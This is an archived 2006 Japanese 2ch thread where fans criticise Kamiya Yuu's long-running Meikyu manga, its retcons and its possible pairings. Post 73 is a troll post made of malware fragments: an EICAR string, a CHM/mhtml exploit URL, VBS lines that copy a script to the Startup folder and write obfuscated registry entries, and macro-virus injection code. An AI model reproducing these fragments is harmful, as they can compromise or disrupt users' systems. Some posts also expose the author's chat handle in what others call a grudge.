5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★神谷悠★迷宮シリーズ他 7

1 :花と名無しさん:2006/08/11(金) 15:46:58 ID:???0
別冊花とゆめで迷宮シリーズを連載中の、神谷悠先生の作品について語りましょう。

【前スレ】
★神谷悠★迷宮シリーズ他 6
http://comic6.2ch.net/test/read.cgi/gcomic/1130084236/

過去スレ、関連スレ等は>>2

2 :花と名無しさん:2006/08/11(金) 15:48:07 ID:???0
【過去スレ】

☆迷宮スレッド(京&一平 アキラ&結城)★
http://comic6.2ch.net/test/read.cgi/gcomic/1064152141/
★神谷悠★迷宮シリーズ 4.5
http://comic.2ch.net/gcomic/kako/1044/10449/1044977328.html
★神谷悠★少女漫画迷宮 4―☆
http://comic.2ch.net/gcomic/kako/1043/10434/1043449313.html
神谷悠・迷宮シリーズ他 No.3
http://comic.2ch.net/gcomic/kako/1037/10375/1037511665.html
神谷悠・迷宮シリーズ他 No.2 
http://comic.2ch.net/gcomic/kako/1000/10006/1000691631.html
神谷悠の迷宮シリーズ
http://mentai.2ch.net/gcomic/kako/961/961316598.html
神の谷の迷宮★☆★
http://salad.2ch.net/gcomic/kako/974/974692468.html

【2ch gcomic 過去ログ倉庫>神谷悠】
http://gcomic2ch.hacca.jp/kamiya/index.html

【関連スレ】
さぁて今号の別冊花とゆめ・ザ花とゆめ4号
http://comic6.2ch.net/test/read.cgi/gcomic/1148892141/

3 :花と名無しさん:2006/08/11(金) 18:25:40 ID:???O


4 :花と名無しさん:2006/08/11(金) 19:03:04 ID:???0
>1
乙ー。

5 :花と名無しさん:2006/08/11(金) 21:17:10 ID:???0
即落ち防止

6 :花と名無しさん:2006/08/11(金) 22:23:50 ID:???0
>1乙彼!

なんだかんだ文句を言っても、
やはりかつては好きだった作品で感動したこともあるので
綺麗に終わって欲しいなと思ってます。

7 :花と名無しさん:2006/08/12(土) 01:11:32 ID:???0
>>1
モツカレ〜

>>6
禿胴。京には一平の娘をくっつけるような真似をせず、
できるだけ早くすっきり完結してホスィ。

8 :花と名無しさん:2006/08/12(土) 12:19:31 ID:???0
>1
乙!!

9 :花と名無しさん:2006/08/12(土) 17:14:35 ID:???0
1乙
とりあえず保守

10 :花と名無しさん:2006/08/12(土) 19:27:27 ID:???0
折角別花が毎月発行になったんだから毎回迷宮じゃなくて、
交代で違う読みきりとかも描いてくれてもいいのにと思う・・。

11 :花と名無しさん:2006/08/13(日) 00:30:20 ID:???0
波みたいに神谷さんのweb日記まで魚血までする気はないが、
別冊出るまでネタが思いつかん。。。

12 :花と名無しさん:2006/08/14(月) 07:17:56 ID:???0
保守

13 :花と名無しさん:2006/08/14(月) 10:00:47 ID:???0
>>11
同感
ヲチは基本的に面倒だからやらないし
一ヶ月語れる程ネ申展開は望めないだろうし

マジで早く終わらないかな、迷宮…
いい加減シリーズとしての寿命は尽きてるだろうにな
んで次は説教くさくないのキボン


14 :花と名無しさん:2006/08/15(火) 00:02:51 ID:???0
作者か主人公が死ねば丸く収まるな

15 :花と名無しさん:2006/08/15(火) 01:58:56 ID:???0
…いくら何でも作者氏ねと言わんばかりのその発言は、賛同しかねる。
でもキャラの成長物語ももう限界まで描いているので、
京の明るい未来を予感させるラストシーンさえあれば
無問題なのにねぇ…神谷さん的に何を描きたいのか…?

16 :花と名無しさん:2006/08/15(火) 04:49:24 ID:???0
>>14
さすがに、言い過ぎ。慎めよ…

>>15
さぁ〜?全く以てわからない<描きたい事
自分の萌えの赴くままなんじゃない、って同人誌じゃあるまいしな

17 :花と名無しさん:2006/08/15(火) 09:50:11 ID:???0
萌えの内容が面白いならそれでも全然かまわないんだけど
いかんせんツマンネ状態だからなぁ…
こんな説教臭い漫画どういう読者層を想定して描いてるのかも掴めないや

18 :花と名無しさん:2006/08/16(水) 08:16:53 ID:???O
即死防止

19 :花と名無しさん:2006/08/16(水) 17:18:20 ID:???0
保守

20 :花と名無しさん:2006/08/17(木) 01:41:45 ID:???O
20!ヤタ!即死防止クリア〜

21 :花と名無しさん:2006/08/17(木) 15:53:39 ID:???O
30じゃなかったっけ?
板によって違ったりするの?

22 :20:2006/08/17(木) 16:47:30 ID:???0
>>21
即死判定は板によって違います。
管理側はその情報をオープンにしていないけれども
最近よそのスレの状況やあちこちで会話した結果、
少女漫画板は「20」を超えれば大丈夫だそうです。
dat落ちの判定も甘くなってるのか、1ヵ月半放置されたスレが
なかなか落ちなかったのを目撃しました。

23 :花と名無しさん:2006/08/18(金) 00:41:17 ID:???0
ttp://www.hakusensha.co.jp/book-store/magazine/index.html
(白泉社 最新雑誌情報、8/1更新)
現在の神谷さんの雑誌内位置付けの参考になるかな・・・
個人的には予想以上に低いんだが。

24 :花と名無しさん:2006/08/18(金) 03:43:37 ID:???0
>>23
ごめん、それで何がわかるのかがわかんないんだけど…
乗ってる順が売り上げ順って事?


25 :花と名無しさん:2006/08/19(土) 10:31:04 ID:???0
迷宮は山田の結婚あたりで京、自立で終了するのが一番よかったのにね
もう京にも山田にも伸びしろを感じないから、何がおきても蛇足っぽくて。
いっそキャラを一新して、世界観だけ継承(脇のほうに京なり、山田なりが
いる)した別の迷宮シリーズでもやってくれたほうがましと思うようになった。

26 :花と名無しさん:2006/08/19(土) 17:00:45 ID:???0
>24
飛翔みたいだって言いたいのでは?
飛翔は掲載順が後ろに行けば打ち切り候補だから



27 :花と名無しさん:2006/08/19(土) 21:23:28 ID:???0
神谷さんが件のゲームのチャットでハジケ中 (、、)イキイキシテルネ

神谷さん本人のハンドルは『天王寺』
神谷さんのゲーム中の恋人のハンドルは『音桜』

http://www.dayan.ne.jp/teachat/chat.cgi

ゲームでアカウントとってないと入室禁止らしい

28 :27:2006/08/19(土) 21:27:15 ID:???0
ロムは出来るので神谷さんを生暖かく見守ってきまつ

29 :花と名無しさん:2006/08/19(土) 22:04:44 ID:???0
>27
私怨乙

30 :花と名無しさん:2006/08/20(日) 03:17:18 ID:???0
>>26
ああそういう意味か…
でも花夢系は飛翔と違って、後ろ=打ち切り候補じゃないでしょ?
魔夜峰央とかずっと後ろだけど、安定した人気と売り上げだし
神谷氏より下はありえないでしょ。

>>27
ヲチはヲチ板でどうぞ。
私怨ならリアルチラシの裏にでも。

31 :花と名無しさん:2006/08/20(日) 18:36:07 ID:???0
魔夜さんはジャンプで言えばこち亀の人みたいな特別待遇だと思う

だからといって別花がジャンプと同じ掲載方法だとは限らないけどね

32 :花と名無しさん:2006/08/20(日) 19:59:23 ID:???0
「巻末」ってアンケは取れないけど、コミックスは確実に売れる
ベテラン作家の定位置では。
バナナフィッシュとかこれだったな。

33 :花と名無しさん:2006/08/26(土) 14:07:46 ID:???0
表紙・巻頭には上っ面だけでもいいから目立つ作品を置くわけで、
別に内容がうすっぺらでも他人のフンドシでもいいのですよねえ。
本当に構成力や実力がある作家は、掲載位置には左右されないから
何番目に載ろうが問題にならないのですけどねえ。

34 :花と名無しさん:2006/08/26(土) 14:26:47 ID:???0
実際問題、花夢系の漫画で「こりゃ打ち切りだよ」みたいな終わり方した漫画ってなくない?
10年くらい花夢とララ買ってたけど、記憶にないな
掲載位置で人気の度合いをはかるれるのは、やっぱりジャンプだけなんじゃないのかねえ。


35 :花と名無しさん:2006/08/26(土) 14:50:08 ID:???0
うちきりはあるし、最終回が不自然につめこまれてて
いかにも変な作品もあるよ。
雑誌の購買層に人気のある作品は、前の方に掲載されてるよ。
現実見ようよ。

36 :34:2006/08/26(土) 15:22:51 ID:???0
>>35
いや、別に現実逃避はしてないよw
買ってた時期の問題かもしれないが、うちきりっぽい作品マジで思い当たらん
自分が興味ない作品流し読みしてるからかもしれないが
人気のある作品が巻頭カラーになるのはわかってるけど
後ろにいったら打ち切りって方式でもないんじゃね?って言いたいだけ

神谷氏の最近の作品がつまんない&人気ないのは否定してないしね。

37 :花と名無しさん:2006/08/26(土) 19:54:23 ID:???0
>>34
別花では結構あるよ。打切り。
杜野さんの碧ミレとか潮見さんのブラックアイズとか
面白かったのに強引に終わらされてしまった…

38 :花と名無しさん:2006/08/26(土) 21:35:12 ID:???0
どこの雑誌でもやっぱり打切りってあるんじゃないの?
飛翔はそれが極端てだけで。

39 :34:2006/08/27(日) 01:13:44 ID:???0
>>37
あ〜、別花は買ってないからわかんなかった。ありがォ
つかまあ、元々は掲載位置の話だったんだけどねw
話そらしちゃってスマン

40 :花と名無しさん:2006/08/27(日) 22:22:05 ID:???0
この頃に連載終了していたらなぁと、記事を読んだとき思ったもので。



富士登山:車椅子の2人が登頂 支援の人と
ttp://www.mainichi-msn.co.jp/shakai/wadai/news/20060828k0000m040079000c.html

41 :花と名無しさん:2006/08/29(火) 06:47:10 ID:???O
おまいら、次回は2月号で新作読み切りってことは、

「第一部・完」

ですか?

42 :花と名無しさん:2006/08/30(水) 21:17:01 ID:???0
もう前スレで叩きたいだけ叩いたからいいや

もう興味無い
勝手に糞みたいな漫画描いていつか終れば?


って思ってるアンチの心情を顕し過疎化

43 :花と名無しさん:2006/08/31(木) 00:03:02 ID:???0
>>42
×アンチ
○元ファン

涙……

44 :花と名無しさん:2006/09/03(日) 00:26:35 ID:???O
とうとう立ち読みする人すら居なくなったのか…?

45 :花と名無しさん:2006/09/03(日) 20:17:00 ID:???O
立ち読みしたよ。
感想
子供がいっぱい出てきた。

46 :花と名無しさん:2006/09/03(日) 21:00:07 ID:???O
立ち読みしたけど、さっぱり覚えてない

47 :花と名無しさん:2006/09/03(日) 21:09:44 ID:???0
お父さん帰ってきてよかったね(^^)

ぐらいしか感想沸かなかった。

48 :花と名無しさん:2006/09/04(月) 17:42:36 ID:???0
雑誌買ってるから読むんだけど、最近時系列が本気で理解できない…

49 :花と名無しさん:2006/09/05(火) 22:52:33 ID:???0
>27
そのゲームが何なのか全然しらないけど、そのHNからして
神谷さんって天王寺民なのかな?自分も天王寺民だからびびったw

神谷さんにはむしろゲームなり旅行なり遊びなりして、引き出し増やして
説教くさくない漫画を描いてほしいわw

50 :花と名無しさん:2006/09/06(水) 01:34:34 ID:???0
自演みっともない。

51 :花と名無しさん:2006/09/06(水) 18:32:28 ID:???0
がんばってるな、神谷さん。
でも昭和絵でヤオイはちょっと…


http://manngasann.hp.infoseek.co.jp/icha.JPG

http://manngasann.hp.infoseek.co.jp/sekkinn.JPG

http://manngasann.hp.infoseek.co.jp/asa.JPG

http://manngasann.hp.infoseek.co.jp/kawaasobi1.JPG

http://manngasann.hp.infoseek.co.jp/kawaasobi2.JPG

http://manngasann.hp.infoseek.co.jp/omutu.JPG

http://manngasann.hp.infoseek.co.jp/juuni.JPG

http://manngasann.hp.infoseek.co.jp/omikuji.JPG

52 :花と名無しさん:2006/09/06(水) 22:12:20 ID:???0
いつもの人キター

53 :花と名無しさん:2006/09/06(水) 22:50:40 ID:???0
迷宮の今の展開は嫌いで、ぶっちゃけ早く連載終わって欲しいと思うけど、
私怨の晒しに付き合う気はないんだよな。

54 :花と名無しさん:2006/09/07(木) 08:59:24 ID:???O
展開なんてしてない気が。
ひたすら続きそうで嫌だ。

55 :花と名無しさん:2006/09/07(木) 10:30:55 ID:???0
登場人物が年をとらない設定ならともかく、
このまま一平に第二子やら孫やらできるまで
続けられるとちょっと嫌だなぁ。

56 :花と名無しさん:2006/09/08(金) 00:45:15 ID:???0
私怨に付き合う気はないのに同意だが、つい見てしまった1番目の絵が怖かった
身体ドコー?!

は、さておき。
そんなに続いたらマジで今持ってる単行本も売り払う<孫子の時代まで

57 :49:2006/09/08(金) 02:40:45 ID:???0
>>50
私は自演じゃないぞw(27の人と思われてるんだよね?)
本当に天王寺民だから気になっただけ。
まぁ神谷さんがどこに住んでてもいいんだけど(見かけても分かんないし)
そして最近は立ち読みどころかコミックスすらしばらく買ってない。
砂迷宮からはまって、何年もかなり夢中になったんだけどな・・・微妙に寂しい。

58 :花と名無しさん:2006/09/08(金) 03:33:31 ID:???0
( ´_ゝ`)

59 :花と名無しさん:2006/09/08(金) 12:46:10 ID:???0
最近神谷さんがN間化しているようで悲しい…。
@田にN間が来て「新○○ルゲーム」として連載が再開した時には
驚愕でした。人気が出たシリーズでしか、漫画が描けないほど
人気がない&本人も作れない状況になってしまったのでしょうか…orz

60 :花と名無しさん:2006/09/08(金) 23:02:02 ID:???0
>>59
言ってることはわかるが(かなしいことに)
個人的記号化しすぎだろww
それにそのレスはむしろ
http://comic6.2ch.net/test/read.cgi/gcomic/1153182376/
ここに書くべきものではないのかと。

61 :59:2006/09/08(金) 23:26:42 ID:???0
>>60
言葉足りなかった?
ラスト一行の>人気が出たシリーズでしか、漫画が描けないほど
人気がない&本人も作れない の部分は、
神谷さんに向けての意味もあるつもりなんだけど。

62 :花と名無しさん:2006/09/09(土) 17:14:52 ID:???0
記号化うっとおしいからヤメレ。
59の文章では野間の事に対してしか言ってないように見えるよ

最近の迷宮の話の展開には私もついていけないが
なんかここ私怨ポイ人がいない?画像直リンしたりしてるし…

63 :花と名無しさん:2006/09/09(土) 17:38:24 ID:???0
ポイっつうか、そのものな人が居ついちゃってる。

64 :花と名無しさん:2006/09/09(土) 18:20:42 ID:???0
私怨つーか、粘着な人が一人いる模様。
文章独特だからすぐ分かるyo。
一応雑誌も読んでる派なんだけど、ここで感想書き込む気にはなれない…。


65 :花と名無しさん:2006/09/15(金) 21:44:43 ID:???O
一平の結婚で「ああ、迷宮が終わっちゃう…」と思っていた、あの頃。
今となっては終わってくれた方が良かったorz

66 :花と名無しさん:2006/09/15(金) 22:34:01 ID:???0
私はこのみさん米国行きで(ry
本当にこの時終わってくれていたら傑作だったのにな…

67 :花と名無しさん:2006/09/15(金) 23:01:29 ID:???0
終わらないで欲しいと思っている間に終わるのが一番いいんだろうね。

68 :花と名無しさん:2006/09/17(日) 00:06:31 ID:???0
迷宮って、まだ続いてたのか…

69 :花と名無しさん:2006/09/17(日) 07:06:51 ID:???0
最近だと惜しまれつつ終わった作品ですら再開して
「なぜ再び現れたんだ…orz」
というものも多いけどね…

70 :花と名無しさん:2006/09/19(火) 10:51:16 ID:???0
少女漫画だとぼく地球、少年漫画だと北斗、リンかけとかか…

71 :花と名無しさん:2006/09/26(火) 02:38:24 ID:???O
河惣さんも…
ダラダラ続いてるか、一旦きれいに終わった作品の番外編とか別花は多いね。
ある程度の売り上げが見込めるから仕方ないんだろうけど。

72 :花と名無しさん:2006/09/27(水) 23:40:46 ID:Q6Ejcw4o0
別花に多いというか・・・
今の漫画はそれが多すぎだと思う。

飛翔なんか別の出版社に移っただけで
似たようなの書いてるし。
番外編ってしてるだけでまだマシな気もする。。。

73 :<body onload=window()>:2006/09/28(木) 01:05:26 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

74 :花と名無しさん:2006/09/28(木) 21:17:13 ID:???0
まあ全くの新人とかに連載させたりするよりは
リスクが少ないもんね
出版社氷河期なこの時代、仕方ない気はする
ベルばらが人気ありすぎて次作にキャラ続投させられた例もある
問題は質が落ちまくってる事だよな


75 :花と名無しさん:2006/09/28(木) 23:44:59 ID:???O
アキラと結城のBL紛いも我慢して読んでたが、左京絡みの超展開にはさすがに引いた。
あれから雑誌も買ってない。

さっくり終わってりゃ、こんな悲惨な事にはならなかったのに…

76 :花と名無しさん:2006/09/29(金) 10:04:58 ID:???0
結城とアキラの超展開の彼女ないがしろさに吐き気がして
それまで我慢してたのが全てダメになったわけだが
京と一平が気になって情報だけは集めてたんだが
左京のネタ聞いて唖然としたよ…orz

良作(極初期だけだが)を駄作以下に自分で貶めてどうするんだ…

77 :花と名無しさん:2006/09/29(金) 16:20:30 ID:???0
左京絡みもそうなんだけど
山田と京が子供のころに会ってました…ってのもなんかイヤ。

78 :花と名無しさん:2006/09/29(金) 20:48:46 ID:???0
>>75-77
ほぼ全面的に同意
ただ中期にも良作はいくつかあったと思ってるけどね。
いずれにしても今は……(涙

ああ。未練がましいなあ……

79 :花と名無しさん:2006/09/29(金) 20:59:13 ID:???0
子供の頃に会ってましたってのは長く続くシリーズ物なら
一度はやるネタなので仕方ない部分もあるのかもしれない。
が、左京ネタはいただけない。

80 :花と名無しさん:2006/09/29(金) 21:16:04 ID:???0
確かに常套ネタではある。でもやっぱり萎えるんだが。
同じように萎えるのは、普通の家の子なのにすごい才能を持っていると思っていたキャラが、
実はすごい才能のあるヤツの隠し子だったりするネタ(幽白の幽助とか他にも色々)。
京もなあ………………

81 :花と名無しさん:2006/09/29(金) 21:46:23 ID:???0
京は元々おぼっちゃまくん設定では?

子供の頃会ってた話はもっと早くにやってれば
最初からそういう設定だったのかも、と思えるけど
さんざん話が進んでから描かれると、ああネタ切れか、としか思えん

82 :花と名無しさん:2006/09/29(金) 22:10:54 ID:???0
「おぼっちゃま(やや変形だけど)」設定はまあ比較的初期からだが、
左京との「血縁」で推理力を説明しようとしてるよな気がする。
むしろ逆か、左京がキレるのは京のオヤだから、とか……(||ーー;)

83 :花と名無しさん:2006/09/30(土) 01:00:35 ID:???0
子供の頃会ってましたネタは同人誌なんかで
ファンがよくやる素人でも思いつくネタなんだけど
それを作者本人がやっちゃってるのかなんかイヤ…
こういうのはもしそうならいいねって話であって
本当にそうだとご都合主義ここに極まれりって感じ

84 :花と名無しさん:2006/09/30(土) 11:58:00 ID:???0
つーか、責任転嫁するつもりはないけど
編集の人とかは気にならないのかな、この超展開…
新しいシリーズとかやられるよりはマシと思ってるのか
人の話聞かないから諦めてるのか
編集も元設定忘れててどーでもいーのか

止めてあげればいいのに、そこまで思い入れもないんだろうかやはり

85 :花と名無しさん:2006/09/30(土) 14:51:53 ID:???0
引き延ばしているのはむしろ編集の方だと思うけど。
コミックスが売れるんならいくらでも続けさせるでしょう。
ツーリングしかりボク地球の続編しかり。

86 :花と名無しさん:2006/09/30(土) 16:37:44 ID:???0
編集と神谷さんの利害が一致してる感じ
お互いに面白い作品作ろうって情熱はもうないんだろうな・・・

87 :花と名無しさん:2006/09/30(土) 18:50:46 ID:???O
最近は出版社・編集共に漫画家を育てたりする雰囲気を感じないから、
神谷さんがそこそこの作品が描けるうちは現状維持で、ダメになったら
ポイ捨てされそうな希ガス。
神谷さん自身もヌルい空気に浸って、新しく作品を作る気概が
無くなってしまったのかなぁ?

88 :花と名無しさん:2006/10/01(日) 09:27:01 ID:???0
やっぱそうなのか…
てか、ツーリングとかぼく地球とかみたいな
コアなファンのいる作家でもないと思うんだけど
それでも売れるのかね、コミクス


89 :花と名無しさん:2006/10/01(日) 21:24:16 ID:???0
75同様でもう雑誌買ってないし、それ以降に出た文庫ももう買う気がしない……
以前に買ってたコミックスや文庫については、どこまでを売るか、全部売るかを考え中。

90 :花と名無しさん:2006/10/02(月) 13:40:21 ID:???0
>>89
考えるだけ、愛があるじゃないかw
自分は我慢していた反動か、超展開直後に全部ブコフに持ってったよ

91 :花と名無しさん:2006/10/02(月) 21:39:28 ID:???O
まあ、みんなの願い通り休載している訳で。
それとも神懸った最終回を望んでいるかい?
ってこれじゃまるで漏れ作者乙。

92 :花と名無しさん:2006/10/02(月) 22:27:23 ID:???0
自分は神懸かった最終回なんて望んでないよ
もうこれ以上昔の作品まで汚す設定返しをしないで
無難な最終回描いてくれたらそれでいい

93 :花と名無しさん:2006/10/03(火) 22:39:41 ID:???0
無難でいいよね、無難でさ…


94 :花と名無しさん:2006/10/04(水) 22:19:59 ID:???0
そうだね。無難が一番だよね。
いきなり十数年後になって、山田娘と京の結婚式とか見せられたら泣く…

95 :花と名無しさん:2006/10/04(水) 23:35:00 ID:???0
>>94
すごい事考えちゃった。
山田夫妻(または山田単独、もしくは父子) 綾小路家資産乗っ取り計画・・・
一見人柄が良い人に限ってって言うもんね・・・


うわー!! 自分の思考がいやだぁ〜

96 :花と名無しさん:2006/10/05(木) 00:28:48 ID:???0
悪いけど、あんまし面白くない。
過去にちょっとでも伏線が張られてないと、そういうのは「……はあ〜っ?」
てことになるのよ。左京パパ説が出た今の状況がそうでしょう。

可愛いけどさ。中学生?

97 :花と名無しさん:2006/10/05(木) 01:08:42 ID:???0
まぁ、>95は冗談でしょ。
山田の性格変えちゃったら、それこそこれまでの話を全否定なわけだしね。

>94の山田娘と京の結婚式はね…
超展開でプロポーズしちゃってるしね…
ある意味、山田と出会って過ごして来たことが山田娘とハッピーエンドを迎える
伏線と言えなくもないけれど、激しく嫌だ。
コミックスのおまけで成長した娘と京を描こうとした所から、作者がこのカップリングに
萌えてそうなところがへこむわ。

98 :花と名無しさん:2006/10/05(木) 02:02:44 ID:???0
ある意味アキラ達より地雷カプだよ…

99 :花と名無しさん:2006/10/05(木) 02:30:02 ID:???0
うん。私はアキラと結城は
いずれくっつきます宣言があったから気にならなかったけど、
これだけは本当に気持ち悪い。

100 :花と名無しさん:2006/10/05(木) 03:25:32 ID:???0
やっぱりエリさんとが無難かな?

101 :花と名無しさん:2006/10/05(木) 05:31:48 ID:???0
つーか京って誰かと結婚するようなキャラじゃなかったと思うんだけどね
成長したから結婚も有りってことかもしれないけど
誰とも結婚できないんじゃなくてあえて結婚しない人生選ぶタイプかなと思ってた
まぁ子沢山で奥さんと子供に囲まれる京ってのもほのぼのしていいなとも思うんだけど
今の神谷さんだとそれすら気持ち悪い話にされそうでなんか怖いんだよね…

102 :花と名無しさん:2006/10/05(木) 12:34:03 ID:???0
私はアキラと結城はくっついた経緯が嫌いだっただけで
くっつく事自体は>>99氏が言うように宣言あったから想定の範囲内だったけど
山田娘と京なんてロリコンも極まれりって感じだし、
山田への友情の代償行動っぽくて娘も可哀相だし京の人格も疑いたくなる

つーか、本当にそんな最終回(でなくてもだけど)描いたら
神谷さんの漫画の全てを記憶から消去するよ…

ついでだが
>>95が気持ち悪いのは発想や書き方が中学生なのに
書いてる人は昼メロ好きのチュプっぽいところだろな

103 :花と名無しさん:2006/10/05(木) 13:09:41 ID:???O
つか、結婚が人生のゴールな訳じゃない。主役が男性キャラツートップなら、
片方家庭持ちにしたので、もう片方はまた別の幸せがあればいいんじゃ?
京の人間不信な冷たい部分が改善され、成長したのはそれなりに描けたのだから
そろそろEndマークを付けて欲しい。
京の結婚や子持ち話まで続けるんなら、安っぽいレディコミ見てるような気になる。

104 :花と名無しさん:2006/10/05(木) 22:09:25 ID:???0
京はずっとひとりでいいんじゃないのかね
なんで無理やり山田娘とくっつけなきゃならないのか

色んな葛藤やトラウマを乗り越えたけど、多分後世に遺伝子を繋ぐ気はなさそうだったんだけど
最初の頃はね

今は読む気もないから知らんけど、そんな結婚してハッピッピ♪みたいな京はちょっと…

結婚して子供を作るのが一番幸福だと思ってるんだろうなぁ、作者が


105 :花と名無しさん:2006/10/06(金) 02:06:51 ID:???0
まだ京と山田娘が結婚すると決まったわけじゃないんだし…
決まってから文句言おうよ
文句言わずに済むならそれに越したことはないけど

106 :花と名無しさん:2006/10/06(金) 16:04:10 ID:???0
どんどん年を取らせちゃったのがいけないのかも・・・
漫画なんだから年を取らせなくても精神的に成長させることは可能なはず。
実際アキラはオチちゃうって理由で年取ってないし。
20代半ば過ぎて童貞設定はキモいし。

107 :花と名無しさん:2006/10/07(土) 17:56:21 ID:???0
まだシリーズ初期だったころ、ほっといても幸せになりそうな山田より
京のほうに彼女もしくは奥さんができて子供持つ幸せを味わって欲しいなぁ
なーんて思ったこともあった。。。

父親は神崎氏でいいじゃないか。死んだ妹がかわいそうだ。

108 :花と名無しさん:2006/10/09(月) 00:01:38 ID:???O
まだ若かった篁(タカヤだっけ?綾小路家の執事みたいな人)の
みやに対する淡い気持ちさえも踏みにじってるしな…
第一話との辻褄合わなさ加減は、いくら後付け設定としても酷すぎる。
娘は無駄死に、母は無駄発狂…

109 :花と名無しさん:2006/10/09(月) 03:35:34 ID:???0
つか、未読なんでどーゆー経緯で神崎氏は京を息子だと言ったのかがわからん…

みやに頼まれてだとしたら妻と娘に失礼な話だし
みやが適当に嘘ついたんだったら、神崎氏に失礼だし
後付け設定でそれまでの印象をぶち壊してる辺り、大失敗だよなあ

110 :花と名無しさん:2006/10/09(月) 04:12:46 ID:???0
少なくとも読まずに批判するのはどうかと思うが。
ちゃんと描いてあるよ。

111 :花と名無しさん:2006/10/09(月) 13:39:49 ID:???0
でも読まない方がいいと思う
少なくとも自分は読んで後悔した…

112 :花と名無しさん:2006/10/09(月) 17:14:16 ID:???0
未読のまま批判するなというのは正しいと思うし、
109の批判は申し訳なかった

でも読みたくない…普通に終わって次の作品描いてくれないかな
今の作品以下でなければ、なんでもいいよもう

113 :花と名無しさん:2006/10/15(日) 01:19:54 ID:???O
他の作品描いたところで「ぴのこの恋」とかいう短編じゃあ…ねえ?
ダーク京の闇シリーズでいいよ。

114 :花と名無しさん:2006/10/21(土) 16:33:54 ID:???0
恵理と京がケコーンする終わりとかだったら近所の川にコミクス捨てる

115 :花と名無しさん:2006/10/21(土) 20:21:26 ID:???0
誰ならいいんだ。緑?リンダ?

116 :花と名無しさん:2006/10/21(土) 21:36:27 ID:???0
初志貫徹。生涯独身でいて欲しい…

117 :花と名無しさん:2006/10/22(日) 01:19:18 ID:???O
ケコーンはともかく
月子に一票

118 :花と名無しさん:2006/10/22(日) 12:24:59 ID:???0
神谷氏ブログに
>某モーホーカップルが
>かつてない激しさでナニなさってるシーンがババーン!!と!!ひーっ!
っていうシーンを描いたってあったけど、そんなのあったっけ?

119 :花と名無しさん:2006/10/22(日) 19:13:41 ID:???0
その内容自体がどうでもいいけど、神谷さんの脳内妄想じゃないの

120 :花と名無しさん:2006/10/23(月) 13:10:24 ID:???0
ツーリングとかじゃないの?
その時にやってたかどうか知らんけど。

121 :花と名無しさん:2006/10/23(月) 21:45:16 ID:???0
>>118-120
キモチワルイ。勘弁してほしい。なんかもう、ホントお願いだからやめてほしい。

生涯独身、緑、リンダ、月子、一平(わおー)、どの辺りが作者の希望なんだろうねえ。
なんかもう、いろいろと勘弁して欲しい。
早く終わってくれ。そしたら、今まで買ってきた奴を売るか捨てるか取っとくか、
ちょっとは考えられるから……     今までのとこ……ゲロゲロ

122 :花と名無しさん:2006/10/23(月) 22:53:36 ID:???0
>>121
ゲロゲロするくらいなら全部売ってこの作品のこと忘れろよ^^


123 :花と名無しさん:2006/10/24(火) 07:48:44 ID:???0
飲みすぎてゲロゲロするなら酒を断てって?^^

124 :花と名無しさん:2006/10/24(火) 12:31:03 ID:???0
本当の本命は一平なんじゃないのー?


125 :花と名無しさん:2006/10/24(火) 13:32:21 ID:???0
そりゃないだろう。
作者自身も「この二人がくっつくのは考えられん」って言ってた。

126 :花と名無しさん:2006/10/25(水) 01:14:27 ID:???0
まぁ、ある意味本命は一平なんだろうね。
恋愛対象ってことではなく、京の中で一番大切な人は
親友でありお母さん?でもある一平だと思う。


127 :花と名無しさん:2006/10/25(水) 01:37:36 ID:???0
京と一平を見てると、大島弓子の「ダイエット」
という漫画を思い出す。
拒食症の女の子を、友人の同級生の女の子とその彼氏が
「育て直す」と決心するお話。

128 :花と名無しさん:2006/10/25(水) 01:48:44 ID:LmDEvqib0
age

129 :花と名無しさん:2006/10/25(水) 09:05:55 ID:???0
>>127
ある意味、一平も育て直したわな
その辺りはそこそこ許容範囲だが、その後がなー
京は完璧超人だし、一平は親ばかMAXだし
それだけでもう十分厨設定なんだから
一平の娘と結婚とかいう陳腐な結末はマジで勘弁だよ…


130 :花と名無しさん:2006/10/25(水) 22:03:24 ID:???0
ていうかみどりと結婚だったら京何歳だよww
そんなことしたら本気で引くわー。

やりそうで恐いけどwww

131 :花と名無しさん:2006/10/29(日) 03:58:41 ID:???O
性欲皆無な京は結婚を決意した相手以外とセックルしそうにないから
みどりと結婚となると四十路の童貞男が出来上がり?

132 :花と名無しさん:2006/10/29(日) 05:19:12 ID:???0
前にも書いたけど、
40になっていきなりセックルしようと思っても無理だよ!
生殖機能って全然使わないと衰えるんだよ!

133 :花と名無しさん:2006/10/31(火) 00:54:18 ID:???0
ということは生涯童貞なのか…


ま、いんじゃね?^^

134 :花と名無しさん:2006/10/31(火) 10:03:10 ID:???0
しかし、ミラクル神谷タンのこったから
また出来婚だったりしてな
そんなんなったらブコフに持ってく間もなく
焼却処分にしたくなるw


135 :花と名無しさん:2006/11/05(日) 21:29:24 ID:???O
そのうち京が半陰陽だと発覚するんじゃないの。
今更どんなdgdg設定が加わっても驚かないよ。

136 :花と名無しさん:2006/11/05(日) 23:45:36 ID:???0
それはさすがにないだろうw山岸漫画じゃあるまいし>半陰陽

137 :花と名無しさん:2006/11/06(月) 01:41:50 ID:???0
ISとか?

138 :花と名無しさん:2006/11/07(火) 22:15:14 ID:???0
